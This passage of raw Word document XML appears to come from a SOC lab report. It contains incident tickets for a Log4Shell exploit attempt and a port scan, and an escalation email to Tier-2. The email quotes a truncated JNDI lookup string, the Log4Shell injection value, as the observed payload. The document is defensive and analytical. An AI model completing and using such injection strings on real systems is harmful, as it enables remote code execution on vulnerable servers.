          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Medium</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> se</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">verity.</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Recommend IDS block after repeated attempts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="949"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>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Document activity in daily SOC logs.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>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Step 6: Incident Tickets in TheHive</w:t>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A. Log4Shell Ticket (Critical)</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Title:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[Critical] Log4Shell Exploit Attempt Detected on WebServer-1</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Description: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Wazuh detected a Log4Shell exploit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Host: WebServer-1</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Attack IP: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">10.0.2.6</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CVE: CVE-2021-44228</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MITRE Technique: T1190</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Immediate review required to check for RCE or malicious payload deployment.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Priority:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Critical</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Assignee:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SOC Analyst</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="98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B. Port Scan Ticket (Low)</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tabs>
          <w:tab w:val="center" w:leader="none" w:pos="4514"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Title:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[Low] Port Scanning Detected from 10.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">0.2.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>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Description: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Multiple sequential port probes detected from IP 10.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">0.2.6</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Activity matches MITRE T1046 (Network Service Scanning).</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No successful access attempts.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Monitoring recommended.</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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Priority:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Low</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Assignee:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SOC Analyst</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="98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lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Escalation Email </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w: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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Subject: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Urgent Escalation – Log4Shell Exploit Attempt on WebServer-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="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sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">SOC L2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
        <w:br/>
        <w:t xml:space="preserve">Wazuh has detected a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Log4Shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CVE-2021-44228) exploit attempt targeting WebServer-1 using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">${jndi:ldap://...}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload. The attack originated from IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">10.0.2.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Initial triage indicates possible remote code execution behavior. The server is under observation, and firewall blocks are in place. Full logs and IOCs have been uploaded to TheHive case. Requesting Tier-2 support for deeper analysis, system integrity ch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ecks, and forensic validation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Regards,</w:t>
        <w:br/>
        <w:t xml:space="preserve">SOC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">L1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyst</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6382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E42F96F"/>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nsid w:val="668CCB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8C405C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7E72CA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8BA34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44915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4D90A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204250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458867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EC5097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nsid w:val="16382C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0FB7F3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2A36B5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74273D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4968F4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C7C13A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104865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603EE3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F3845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B8C966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02AB6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0644C2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3771D16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60A830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7">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="9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Grid Light"/>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9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9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1"/>
    <w:basedOn w:val="9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2"/>
    <w:basedOn w:val="9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3"/>
    <w:basedOn w:val="9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4"/>
    <w:basedOn w:val="9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5"/>
    <w:basedOn w:val="9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6"/>
    <w:basedOn w:val="9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1"/>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2"/>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3"/>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4"/>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5"/>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6"/>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0">
    <w:name w:val="Grid Table 6 Colorful - Accent 1"/>
    <w:basedOn w:val="9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1">
    <w:name w:val="Grid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2">
    <w:name w:val="Grid Table 6 Colorful - Accent 3"/>
    <w:basedOn w:val="9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3">
    <w:name w:val="Grid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4">
    <w:name w:val="Grid Table 6 Colorful - Accent 5"/>
    <w:basedOn w:val="9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6 Colorful - Accent 6"/>
    <w:basedOn w:val="9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7 Colorful"/>
    <w:basedOn w:val="9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1"/>
    <w:basedOn w:val="9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5"/>
    <w:basedOn w:val="9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6"/>
    <w:basedOn w:val="9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1"/>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2"/>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3"/>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4"/>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5"/>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6"/>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9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1"/>
    <w:basedOn w:val="9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2"/>
    <w:basedOn w:val="9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3"/>
    <w:basedOn w:val="9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4"/>
    <w:basedOn w:val="9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5"/>
    <w:basedOn w:val="9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6"/>
    <w:basedOn w:val="9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1"/>
    <w:basedOn w:val="9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3"/>
    <w:basedOn w:val="9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5"/>
    <w:basedOn w:val="9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6"/>
    <w:basedOn w:val="9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1"/>
    <w:basedOn w:val="9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2"/>
    <w:basedOn w:val="9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3"/>
    <w:basedOn w:val="9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4"/>
    <w:basedOn w:val="9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5"/>
    <w:basedOn w:val="9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6"/>
    <w:basedOn w:val="9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9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1"/>
    <w:basedOn w:val="9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2"/>
    <w:basedOn w:val="9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3"/>
    <w:basedOn w:val="9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4"/>
    <w:basedOn w:val="9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5"/>
    <w:basedOn w:val="9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6"/>
    <w:basedOn w:val="9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1"/>
    <w:basedOn w:val="9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3"/>
    <w:basedOn w:val="9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5"/>
    <w:basedOn w:val="9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6"/>
    <w:basedOn w:val="9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9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6">
    <w:name w:val="List Table 7 Colorful - Accent 1"/>
    <w:basedOn w:val="9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7">
    <w:name w:val="List Table 7 Colorful - Accent 2"/>
    <w:basedOn w:val="9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8">
    <w:name w:val="List Table 7 Colorful - Accent 3"/>
    <w:basedOn w:val="9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9">
    <w:name w:val="List Table 7 Colorful - Accent 4"/>
    <w:basedOn w:val="9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0">
    <w:name w:val="List Table 7 Colorful - Accent 5"/>
    <w:basedOn w:val="9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1">
    <w:name w:val="List Table 7 Colorful - Accent 6"/>
    <w:basedOn w:val="9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2">
    <w:name w:val="Lined - Accent"/>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1"/>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2"/>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3"/>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4"/>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5"/>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6"/>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w:basedOn w:val="9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1"/>
    <w:basedOn w:val="9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2"/>
    <w:basedOn w:val="9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3"/>
    <w:basedOn w:val="9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4"/>
    <w:basedOn w:val="9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5"/>
    <w:basedOn w:val="9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6"/>
    <w:basedOn w:val="9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w:basedOn w:val="9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Heading 7"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:link w:val="9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4">
    <w:name w:val="Heading 8"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:link w:val="9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5">
    <w:name w:val="Heading 9"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:link w:val="9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6">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="988"/>
    <w:link w:val="982"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="937">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="988"/>
    <w:link w:val="983"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="938">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="988"/>
    <w:link w:val="984"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="939">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="988"/>
    <w:link w:val="985"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="940">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="988"/>
    <w:link w:val="986"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="941">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="988"/>
    <w:link w:val="987"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="942">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="988"/>
    <w:link w:val="933"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="943">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="988"/>
    <w:link w:val="934"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="944">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="988"/>
    <w:link w:val="935"/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="945">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="988"/>
    <w:link w:val="992"/>
    <w:uiPriority w:val="10"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:spacing w:val="-10"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="946">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="988"/>
    <w:link w:val="993"/>
    <w:uiPriority w:val="11"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="947">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:link w:val="948"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:before="160"/>
      <w:ind/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="948">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="988"/>
    <w:link w:val="947"/>
    <w:uiPriority w:val="29"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="949">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="981"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind w:left="720"/>
      <w:contextualSpacing w:val="true"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="950">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="988"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="951">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="981"/>
    <w:next w:val="981"/>
    <w:link w:val="9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2">
    <w:name w:val="Intense Quote Char"/>
    <w:basedOn w:val="988"/>
    <w:link w:val="951"/>
    <w:uiPriority w:val="30"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="953">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="988"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0f4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="954">
    <w:name w:val="No Spacing"/>
    <w:basedOn w:val="981"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="955">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="988"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="956">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="988"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
